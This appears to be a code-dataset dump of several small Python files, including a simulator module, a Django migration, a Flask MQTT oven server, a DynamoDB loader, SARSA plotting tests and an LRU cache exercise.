ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
# Fix paths for imports to work in unit tests ----------------
if __name__ == "__main__":
from _fix_paths import fix_paths
fix_paths()
# ------------------------------------------------------------
# Load libraries ---------------------------------------------
# ------------------------------------------------------------
if __name__ == "__main__":
import unittest
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestAuctionsAttributes))
unittest.TextTestRunner().run(suite)
| 33.606557
| 152
| 0.596098
|
# Fix paths for imports to work in unit tests ----------------
if __name__ == "__main__":
from _fix_paths import fix_paths
fix_paths()
# ------------------------------------------------------------
# Load libraries ---------------------------------------------
from typing import Dict
import numpy as np
from collections import namedtuple
from ssa_sim_v2.simulator.modules.simulator_module import SimulatorModule
# ------------------------------------------------------------
class AuctionAttributesModule(SimulatorModule):
"""
    Base class for all auction attributes modules with segments.
:ivar np.random.RandomState rng: Random number generator.
:ivar dict prior: Dict with constant probabilities for every segment.
"""
Params = namedtuple('Params', ['p'])
"""
:param float p: Probability of selecting a user from a segment.
"""
def __init__(self, prior={(0,): Params(p=5)}, seed=9):
"""
:param dict prior: Dict with constant probabilities for every segment.
:param int seed: Seed for the random number generator.
"""
super().__init__(prior, seed)
self.prior = dict()
# Normalize prior and store in self.priors
total_p_values = 0
for key in prior.keys():
total_p_values += prior[key].p
for key in prior.keys():
self.prior[key] = AuctionAttributesModule.Params(p=prior[key].p / total_p_values)
self.rng = np.random.RandomState(seed)
def get_auction_attributes(self, n):
"""
Method that returns a dict of number of times each segment has been selected.
:param int n: Number of auctions for which to sample attributes.
:return: Dict of number of times each segment was present in n auctions.
:rtype: Dict[tuple, int]
"""
# This is used since np does not want to accept tuple as an item and throws error that 'a must be 1-dimensional'
        # dict keys (tuples) are converted to strings, then the random choice is made using the string versions of the keys, then
# results are passed to a final dict where keys are of their original form
keys_dict = dict()
for key in self.prior.keys():
keys_dict[str(key)] = key
keys = list(self.prior)
keys = [str(key) for key in keys]
probabilities = [self.prior[keys_dict[key]].p for key in keys]
choices = self.rng.choice(a=keys, p=probabilities, size=n)
unique, counts = np.unique(choices, return_counts=True)
choices_dict_str = dict(zip(unique, counts))
for key in keys:
if key in choices_dict_str.keys():
pass
else:
choices_dict_str[key] = 0
choices_dict = dict()
for key in self.prior.keys():
choices_dict[key] = choices_dict_str[str(key)]
return choices_dict
if __name__ == "__main__":
import unittest
class TestAuctionsAttributes(unittest.TestCase):
def test_sanity(self):
Params = AuctionAttributesModule.Params
attributes_model = AuctionAttributesModule(
prior={
(0, 0): Params(p=45),
(0, 1): Params(p=25),
(1, 0): Params(p=235),
(1, 1): Params(p=76)},
seed=1234
)
number_of_auctions = [100, 1000, 10000, 15000, 50000, 150000, 300000, 500000]
for num in number_of_auctions:
choices_dict = attributes_model.get_auction_attributes(n=num)
#print(f'Throughout {num} auctions that were run, following segments were selected following number of times: {choices_dict}')
                print('Throughout {} auctions that were run, the following segments were selected this many times: {}'.format(num, choices_dict))
self.assertTrue(True)
print("")
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestAuctionsAttributes))
unittest.TextTestRunner().run(suite)
| 0
| 0
| 0
| 3,367
| 0
| 0
| 0
| 64
| 142
|
348061fbd3722432b2a2937544c82aef93786355
| 232
|
py
|
Python
|
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
| 46.4
| 122
| 0.732759
|
# -*- coding: utf-8 -*-
class InvalidCloudioAttributeTypeException(Exception):
def __init__(self, type):
super(InvalidCloudioAttributeTypeException, self).__init__(str(type) + ' is not a valid cloud.io attribute type!')
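# --- Illustrative usage sketch (editor's addition, not part of the source file) ---
# A minimal sketch of raising and handling the exception above; passing the offending
# Python type is one plausible convention, not something this file prescribes.
try:
    raise InvalidCloudioAttributeTypeException(complex)
except InvalidCloudioAttributeTypeException as error:
    print(error)   # "<class 'complex'> is not a valid cloud.io attribute type!"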
| 0
| 0
| 0
| 186
| 0
| 0
| 0
| 0
| 23
|
b11059298c8234b3e10476c7c2a4e80a7072ec74
| 1,085
|
py
|
Python
|
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | null | null | null |
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | 6
|
2021-03-19T10:08:06.000Z
|
2022-02-10T14:03:57.000Z
|
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.10 on 2020-04-12 13:56
| 30.138889
| 191
| 0.582488
|
# Generated by Django 2.2.10 on 2020-04-12 13:56
import django.core.validators
from django.db import migrations, models
import django_countries.fields
class Migration(migrations.Migration):
dependencies = [
('account', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='bio',
field=models.TextField(blank=True, max_length=500),
),
migrations.AddField(
model_name='user',
name='birth_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='user',
name='country',
field=django_countries.fields.CountryField(blank=True, max_length=2, null=True),
),
migrations.AddField(
model_name='user',
name='phone',
field=models.CharField(blank=True, max_length=17, null=True, validators=[django.core.validators.RegexValidator(message='it should be: +************', regex='^\\+?1?\\d{9,15}$')]),
),
]
| 0
| 0
| 0
| 909
| 0
| 0
| 0
| 36
| 90
|
d34c7fe1bde2e41f49f5f3ca9ebb728a7f0a3605
| 1,570
|
py
|
Python
|
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | 2
|
2020-10-04T16:58:54.000Z
|
2021-10-04T13:51:10.000Z
|
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | null | null | null |
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
from pathlib import Path
NAME = 'model_lstm'
DESCRIPTION = 'LSTM model which classifies the sentiment of English sentences.'
URL = 'https://github.com/ofbennett/sentiment-analysis-app'
EMAIL = '[email protected]'
AUTHOR = 'Oscar Bennett'
REQUIRES_PYTHON = '>=3.7.0'
ROOT_DIR = Path(__file__).resolve().parent
PACKAGE_DIR = ROOT_DIR / 'model_lstm'
LONG_DESCRIPTION = (PACKAGE_DIR / 'README.md').read_text(encoding='utf-8')
with open(PACKAGE_DIR / 'VERSION') as f:
VERSION = f.read().strip()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
package_data={'model_lstm': ['VERSION',
'README.md',
f'trained_models/lstm_model_v{VERSION}.h5',
f'trained_models/lstm_pipeline_v{VERSION}.pkl']},
install_requires=list_reqs(),
extras_require={},
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
)
| 34.130435
| 82
| 0.652229
|
from setuptools import find_packages, setup
from pathlib import Path
NAME = 'model_lstm'
DESCRIPTION = 'LSTM model which classifies the sentiment of English sentences.'
URL = 'https://github.com/ofbennett/sentiment-analysis-app'
EMAIL = '[email protected]'
AUTHOR = 'Oscar Bennett'
REQUIRES_PYTHON = '>=3.7.0'
ROOT_DIR = Path(__file__).resolve().parent
PACKAGE_DIR = ROOT_DIR / 'model_lstm'
LONG_DESCRIPTION = (PACKAGE_DIR / 'README.md').read_text(encoding='utf-8')
with open(PACKAGE_DIR / 'VERSION') as f:
VERSION = f.read().strip()
def list_reqs(fname='requirements.txt'):
with open(fname) as fd:
return fd.read().splitlines()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
package_data={'model_lstm': ['VERSION',
'README.md',
f'trained_models/lstm_model_v{VERSION}.h5',
f'trained_models/lstm_pipeline_v{VERSION}.pkl']},
install_requires=list_reqs(),
extras_require={},
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
)
| 0
| 0
| 0
| 0
| 0
| 85
| 0
| 0
| 23
|
d720558039425b7b46dedfcf73d7c8783c9496cd
| 579
|
py
|
Python
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 115
|
2015-03-23T13:34:42.000Z
|
2022-03-21T00:27:21.000Z
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 56
|
2015-02-25T15:04:26.000Z
|
2022-01-03T07:42:48.000Z
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 59
|
2015-11-26T11:44:51.000Z
|
2022-03-21T00:27:22.000Z
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
from io import StringIO
import sys
arg_parser = ArgumentParser(description='I/O test')
arg_parser.add_argument('-o', dest='output', help='output file')
options = arg_parser.parse_args()
str_io = StringIO()
for line in ['abc', 'def', 'ghi']:
str_io.write(line + '\n')
if options.output:
output = open(options.output, 'w')
else:
output = sys.stdout
output.write(str_io.getvalue())
if options.output:
output.close()
| 28.95
| 68
| 0.632124
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
from io import StringIO
import sys
arg_parser = ArgumentParser(description='I/O test')
arg_parser.add_argument('-o', dest='output', help='output file')
options = arg_parser.parse_args()
str_io = StringIO()
for line in ['abc', 'def', 'ghi']:
str_io.write(line + '\n')
if options.output:
output = open(options.output, 'w')
else:
output = sys.stdout
output.write(str_io.getvalue())
if options.output:
output.close()
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
9df7df112f519136b1e342846112fa1c98437980
| 4,102
|
py
|
Python
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 3
|
2022-01-30T18:00:26.000Z
|
2022-01-30T18:03:34.000Z
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 10
|
2022-01-30T21:06:40.000Z
|
2022-02-03T09:42:36.000Z
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 1
|
2022-02-01T12:48:05.000Z
|
2022-02-01T12:48:05.000Z
|
import argparse
swagger = None
# TODO have blueprints in a separate module
# Arguments
parser = argparse.ArgumentParser(description="SmartOven Flask server")
parser.add_argument('-t', '--test',
help='Run the server in testing mode',
action="store_true"
)
if __name__ == "__main__":
args = parser.parse_args()
create_app(testing=args.test)
app.run(debug=False)
| 29.941606
| 75
| 0.627986
|
import json
from flask import Flask
from flasgger import Swagger
from globals import connected_devices, Oven
import os
import recipes
import ovens
import recipe_search_online
import db
from mqtt_shared import mqtt_manager, mqtt_topics
from constants import MONGO_URI, MONGO_URI_TEST
import argparse
from spec import SWAGGER_TEMPLATE, dump_apispecs_to_json
from flask_pymongo import PyMongo
swagger = None
# TODO have blueprints in a separate module
# Arguments
parser = argparse.ArgumentParser(description="SmartOven Flask server")
parser.add_argument('-t', '--test',
help='Run the server in testing mode',
action="store_true"
)
def create_app(test_config=None, testing=None):
global app, swagger
app = Flask(__name__, instance_relative_config=True)
if not testing:
app.config.from_mapping(
SECRET_KEY='dev',
MONGO_URI=MONGO_URI,
)
else:
app.config.from_mapping(
SECRET_KEY='test',
MONGO_URI=MONGO_URI_TEST,
)
# Setting up Swagger API
app.config['SWAGGER'] = {
'uiversion': 3,
'openapi': '3.0.2'
}
swagger = Swagger(app, template=SWAGGER_TEMPLATE)
if test_config is None:
# load the instance config, if it exists, when not testing
app.config.from_pyfile('config.py', silent=True)
else:
# load the test config if passed in
app.config.from_mapping(test_config)
# Ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
db.init_app(app)
# App blueprints
app.register_blueprint(recipes.bp)
app.register_blueprint(ovens.bp)
app.register_blueprint(recipe_search_online.bp)
# Save OpenAPI specs
# with app.app_context():
# dump_apispecs_to_json(swagger)
mqtt_manager.start("server", 1, [
(mqtt_topics.CONNECT, _handle_device_connect),
(mqtt_topics.DISCONNECT, _handle_device_disconnect)
])
return app
def _handle_device_connect(client, userdata, msg):
client_id = client._client_id.decode()
device_id = msg.payload.decode()
if client_id == device_id:
return
if device_id not in connected_devices:
connected_devices[device_id] = Oven(device_id)
print(f'Device connected {device_id}')
'''
new device connected
subscribe and handle messages sent
    to its corresponding topic
'''
def _handle_device_info(client, userdata, msg):
topic = msg.topic
payload = msg.payload.decode()
data = json.loads(payload)
info_type = topic.split('/')[-1]
print(data)
if device_id not in connected_devices:
# TODO logging
print(f'Device {device_id} not connected')
return
device = connected_devices[device_id]
if info_type == 'temperature':
device.temperature = data
elif info_type == 'recipe_details':
device.recipe_info = data
elif info_type == 'time':
device.time = data
elif info_type == 'state':
device.state = data
elif info_type == 'recipe_done':
# can be replace with notifications in production
print(data.get('message', "Recipe done"))
topic = mqtt_topics.INFO_PREFIX.format(device_id=device_id) + "/#"
mqtt_manager.register_callback(topic, _handle_device_info)
def _handle_device_disconnect(client, userdata, msg):
device_id = msg.payload.decode()
connected_devices.pop(device_id, None)
print(f'Device disconnected {device_id}')
topic = mqtt_topics.INFO_PREFIX.format(device_id=device_id) + "/#"
mqtt_manager.unsubscribe(topic)
if __name__ == "__main__":
args = parser.parse_args()
create_app(testing=args.test)
app.run(debug=False)
| 0
| 0
| 0
| 0
| 0
| 3,227
| 0
| 88
| 380
|
cfebce4ce5effba03e6fe213972dd94622cfecd1
| 511
|
py
|
Python
|
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | 3
|
2018-07-31T19:49:43.000Z
|
2019-06-28T20:52:58.000Z
|
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | null | null | null |
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | 1
|
2018-07-28T19:36:48.000Z
|
2018-07-28T19:36:48.000Z
|
tabela = {'2': 'a',
'3':'d',
'5':'j',
'4':'g',
'6':'m',
'7':'p',
'8':'t',
'9': 'w',
'0': ' ',
}
| 22.217391
| 47
| 0.403131
|
tabela = {'2': 'a',
'3':'d',
'5':'j',
'4':'g',
'6':'m',
'7':'p',
'8':'t',
'9': 'w',
'0': ' ',
}
def converte_num_letra(digitos):
palavra = ''
letra = ''
sequencia = ''
for digito in digitos:
if letra != '' and digito != letra:
palavra = palavra + tabela[digito]
elif digito == letra:
sequencia += digito
palavra = palavra + tabela[digito]
return palavra
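# --- Illustrative completion sketch (editor's addition, not part of the source file) ---
# The dojo function above is left unfinished (letra is never updated and sequencia is
# unused). One possible multi-tap decoding built on the same tabela of "first letter per
# key" is sketched below; the key sizes (keys 7 and 9 carrying four letters) are an
# assumption about the intended 90s-phone layout, and the helper name is hypothetical.
from itertools import groupby

KEY_SIZE = {'2': 3, '3': 3, '4': 3, '5': 3, '6': 3, '7': 4, '8': 3, '9': 4, '0': 1}

def converte_num_letra_multitap(digitos):
    palavra = ''
    for digito, grupo in groupby(digitos):        # consecutive presses of the same key
        presses = len(list(grupo))
        offset = (presses - 1) % KEY_SIZE[digito]
        palavra += chr(ord(tabela[digito]) + offset)
    return palavra

print(converte_num_letra_multitap('4433555'))     # -> 'hel'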
| 0
| 0
| 0
| 0
| 0
| 311
| 0
| 0
| 23
|
494aaca2f4ace6c6bc7d69520a23e5deddd3db65
| 720
|
py
|
Python
|
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | 1
|
2021-03-27T19:01:49.000Z
|
2021-03-27T19:01:49.000Z
|
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | null | null | null |
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | null | null | null |
# location
location = input("Job Location:\n")
pay = input("Payment:\n")
# Prints For decisions
no = "No thanks,I can find something Better"
doubt = "Without a doubt I'll take it"
sure = "Sure, I can work with that"
no_way = "No way!"
# Try and Except
try:
location = str(location)
pay = float(pay)
except:
print("Error, Invalid input")
# After Except
if location == "Mbarara":
if pay == 4000000:
print(no)
else:
if pay > 4000000:
print(sure)
elif location == "Kampala":
if pay == 10000000:
print(no_way)
else:
if pay >= 10000000:
print(sure)
elif location == "space":
print(doubt)
else:
if pay >= 6000000:
print(sure)
| 21.176471
| 44
| 0.594444
|
# location
location = input("Job Location:\n")
pay = input("Payment:\n")
# Prints For decisions
no = "No thanks,I can find something Better"
doubt = "Without a doubt I'll take it"
sure = "Sure, I can work with that"
no_way = "No way!"
# Try and Except
try:
location = str(location)
pay = float(pay)
except:
print("Error, Invalid input")
# After Except
if location == "Mbarara":
if pay == 4000000:
print(no)
else:
if pay > 4000000:
print(sure)
elif location == "Kampala":
if pay == 10000000:
print(no_way)
else:
if pay >= 10000000:
print(sure)
elif location == "space":
print(doubt)
else:
if pay >= 6000000:
print(sure)
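
The branches above encode a simple accept/reject rule per location; a condensed, function-based restatement is sketched below. It is hypothetical (the original prints, this returns the message, or None when the original printed nothing) and reuses the message strings defined above.

# Hypothetical condensed form of the decision branches above (same thresholds, same messages).
def decide(location, pay):
    if location == "space":
        return doubt
    if location == "Mbarara":
        return no if pay == 4000000 else (sure if pay > 4000000 else None)
    if location == "Kampala":
        return no_way if pay == 10000000 else (sure if pay > 10000000 else None)
    return sure if pay >= 6000000 else None
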
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
c64480096569db772606bfc626022fbec11fab93
| 1,753
|
py
|
Python
|
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
# Fix this!
#root = tk.Tk()
#app = SearchDate(master=root)
#app.mainloop()
#data = Data()
#data.db.close()
| 28.274194
| 77
| 0.541928
|
import tkinter as tk
from Data import Data
from EditClient import EditClient
class SearchDate(tk.Frame, Data):
def __init__(self, master=None):
super().__init__(master)
self.frame = tk.Frame(self.master)
self.frame.grid()
self.create_table()
def create_entry(self, row_value, message):
L = tk.Label(self.master, text=message)
L.grid(row=row_value, column=0)
E = tk.Entry(self.master, bd=5)
E.grid(row=row_value, column=1)
return E
def create_table(self):
global E1
E1 = self.create_entry(0, "Data")
B1 = tk.Button(self.master, text="Buscar",
command=self.search_date)
B1.grid(row=0, column=2)
def search_date(self):
parameter = E1.get()
ids = self.contractByDate(parameter)
#print(ids)
self.frame.destroy()
self.frame = tk.Frame(self.master)
self.frame.grid()
i=0
for line in ids:
self.get_contract(line)
self.get_client(self.contract["id_client"])
try:
result = self.client["name"]
except:
result = "(Sem nome)"
button = tk.Button(self.frame, text=result,
command= lambda id_client = self.client["id"]:
self.open_client(id_client))
button.grid()
i=i+1
def open_client(self, id_client):
top = tk.Tk()
client = EditClient(master=top, id_client=id_client)
client.addButtons()
# Fix this!
#root = tk.Tk()
#app = SearchDate(master=root)
#app.mainloop()
#data = Data()
#data.db.close()
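
The commented-out block at the end of the file sketches how the widget is launched; a runnable version of that same bootstrap, assuming the `Data` backend used by `SearchDate` is reachable, would be:

# Launch sketch mirroring the commented-out lines above (assumes a working Data backend).
if __name__ == "__main__":
    root = tk.Tk()
    app = SearchDate(master=root)
    app.mainloop()
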
| 0
| 0
| 0
| 1,546
| 0
| 0
| 0
| 11
| 89
|
2d82e8a5afd34b19a82dd079954acdf19ab0b1a0
| 467
|
py
|
Python
|
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | 4
|
2019-11-13T17:58:15.000Z
|
2020-03-12T12:24:10.000Z
|
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | null | null | null |
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | null | null | null |
import boto3
import json
session = boto3.session.Session( profile_name= 'jmcore' )
dynamodb = session.resource( 'dynamodb', region_name= 'eu-west-1' )
table = dynamodb.Table( 'serverless_workshop' )
with open( "user-sets-data.json" ) as json_file:
users = json.load( json_file )
for user in users:
userID = user[ 'userID' ]
sets = user[ 'sets' ]
response = table.put_item(
Item = {
'userID': userID,
'sets': sets
}
)
| 24.578947
| 67
| 0.631692
|
import boto3
import json
session = boto3.session.Session( profile_name= 'jmcore' )
dynamodb = session.resource( 'dynamodb', region_name= 'eu-west-1' )
table = dynamodb.Table( 'serverless_workshop' )
with open( "user-sets-data.json" ) as json_file:
users = json.load( json_file )
for user in users:
userID = user[ 'userID' ]
sets = user[ 'sets' ]
response = table.put_item(
Item = {
'userID': userID,
'sets': sets
}
)
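
The loop above expects `user-sets-data.json` to hold a list of objects with `userID` and `sets` keys; a hypothetical example of that shape (the IDs and set numbers are made up):

# Hypothetical contents of user-sets-data.json; only the two keys read above are required.
example_users = [
    {"userID": "user-001", "sets": ["10179-1", "75192-1"]},
    {"userID": "user-002", "sets": []},
]
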
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
d9beda75cf8f601813cb1e0106a06881bcd28dbb
| 4,306
|
py
|
Python
|
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
if __name__ == '__main__':
plot_softmax("MiniGrid-Empty-6x6-v0")
| 46.804348
| 105
| 0.51974
|
from sarsa_skel import *
def plot_egreedy(map):
c1 = 0.5
lr1 = 0.1
d1 = 0.99
q01 = 0
steps1, avg_lengths1, avg_returns1 = sarsa_egreedy(map_file=map, learning_rate=lr1,
discount=d1, const=c1, train_episodes=500, q0=q01,
final_show=False)
c2 = 0.5
lr2 = 0.1
d2 = 0.99
q02 = 0.2
steps2, avg_lengths2, avg_returns2 = sarsa_egreedy(map_file=map, learning_rate=lr2,
discount=d2, const=c2, train_episodes=500, q0=q02,
final_show=False)
c3 = 0.5
lr3 = 0.1
d3 = 0.99
q03 = 0.5
steps3, avg_lengths3, avg_returns3 = sarsa_egreedy(map_file=map, learning_rate=lr3,
discount=d3, const=c3, train_episodes=500, q0=q03,
final_show=False)
c4 = 0.5
lr4 = 0.1
d4 = 0.99
q04 = 1
steps4, avg_lengths4, avg_returns4 = sarsa_egreedy(map_file=map, learning_rate=lr4,
discount=d4, const=c4, train_episodes=500, q0=q04,
final_show=False)
_fig, (ax1, ax2) = plt.subplots(ncols=2)
ax1.plot(steps1, avg_lengths1, label="egreedy c:" + str(c1) + " lr=" + str(lr1) + " q0=" + str(q01))
ax1.plot(steps2, avg_lengths2, label="egreedy c:" + str(c2) + " lr=" + str(lr2) + " q0=" + str(q02))
ax1.plot(steps3, avg_lengths3, label="egreedy c:" + str(c3) + " lr=" + str(lr3) + " q0=" + str(q03))
ax1.plot(steps4, avg_lengths4, label="egreedy c:" + str(c4) + " lr=" + str(lr4) + " q0=" + str(q04))
ax1.set_title("Average episode length")
ax1.legend()
ax2.plot(steps1, avg_returns1, label="egreedy c:" + str(c1) + " lr=" + str(lr1) + " q0=" + str(q01))
ax2.plot(steps2, avg_returns2, label="egreedy c:" + str(c2) + " lr=" + str(lr2) + " q0=" + str(q02))
ax2.plot(steps3, avg_returns3, label="egreedy c:" + str(c3) + " lr=" + str(lr3) + " q0=" + str(q03))
ax2.plot(steps4, avg_returns4, label="egreedy c:" + str(c4) + " lr=" + str(lr4) + " q0=" + str(q04))
ax2.set_title("Average episode return")
ax2.legend()
plt.show()
def plot_softmax(map):
lr1 = 0.1
d1 = 0.99
steps1, avg_lengths1, avg_returns1 = sarsa_softmax(map_file=map, learning_rate=lr1,
discount=d1, train_episodes=500, q0=0,
final_show=False)
lr2 = 0.2
d2 = 0.99
steps2, avg_lengths2, avg_returns2 = sarsa_softmax(map_file=map, learning_rate=lr2,
discount=d2, train_episodes=500, q0=0,
final_show=False)
lr3 = 0.4
d3 = 0.99
steps3, avg_lengths3, avg_returns3 = sarsa_softmax(map_file=map, learning_rate=lr3,
discount=d3, train_episodes=500, q0=0,
final_show=False)
lr4 = 0.8
d4 = 0.99
steps4, avg_lengths4, avg_returns4 = sarsa_softmax(map_file=map, learning_rate=lr4,
discount=d4, train_episodes=500, q0=0,
final_show=False)
_fig, (ax1, ax2) = plt.subplots(ncols=2)
ax1.plot(steps1, avg_lengths1, label="softmax lr=" + str(lr1))
ax1.plot(steps2, avg_lengths2, label="softmax lr=" + str(lr2))
ax1.plot(steps3, avg_lengths3, label="softmax lr=" + str(lr3))
ax1.plot(steps4, avg_lengths4, label="softmax lr=" + str(lr4))
ax1.set_title("Average episode length")
ax1.legend()
ax2.plot(steps1, avg_returns1, label="softmax lr=" + str(lr1))
ax2.plot(steps2, avg_returns2, label="softmax lr=" + str(lr2))
ax2.plot(steps3, avg_returns3, label="softmax lr=" + str(lr3))
ax2.plot(steps4, avg_returns4, label="softmax lr=" + str(lr4))
ax2.set_title("Average episode return")
ax2.legend()
plt.show()
if __name__ == '__main__':
plot_softmax("MiniGrid-Empty-6x6-v0")
| 0
| 0
| 0
| 0
| 0
| 4,162
| 0
| 3
| 68
|
47b9a30e8798f592988d1d728ccd51bd10f6cb58
| 958
|
py
|
Python
|
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode id=146 lang=python3
#
# [146] LRU Cache
#
# @lc code=start
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
# @lc code=end
| 22.809524
| 63
| 0.538622
|
#
# @lc app=leetcode id=146 lang=python3
#
# [146] LRU Cache
#
# @lc code=start
class LRUCache:
def __init__(self, capacity: int):
self.cap = capacity
self.d = dict()
self.stack = []
def get(self, key: int):
if key not in self.d:
return -1
self.stack.remove(key)
self.stack.append(key)
return self.d[key]
def put(self, key: int, value: int):
if key in self.d:
self.d[key] = value
self.stack.remove(key)
self.stack.append(key)
else:
if len(self.stack) >= self.cap:
to_delete = self.stack[0]
self.stack = self.stack[1:]
del self.d[to_delete]
self.d[key] = value
self.stack.append(key)
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
# @lc code=end
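
A usage sketch following the "instantiated and called as such" comment above; the capacity and keys are arbitrary examples:

# Example session against the LRUCache above.
cache = LRUCache(2)
cache.put(1, 1)
cache.put(2, 2)
print(cache.get(1))  # 1 (key 1 becomes most recently used)
cache.put(3, 3)      # capacity exceeded: evicts key 2
print(cache.get(2))  # -1
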
| 0
| 0
| 0
| 700
| 0
| 0
| 0
| 0
| 22
|
019902fd823def4e117ea65ffc273ad7678112be
| 7,817
|
py
|
Python
|
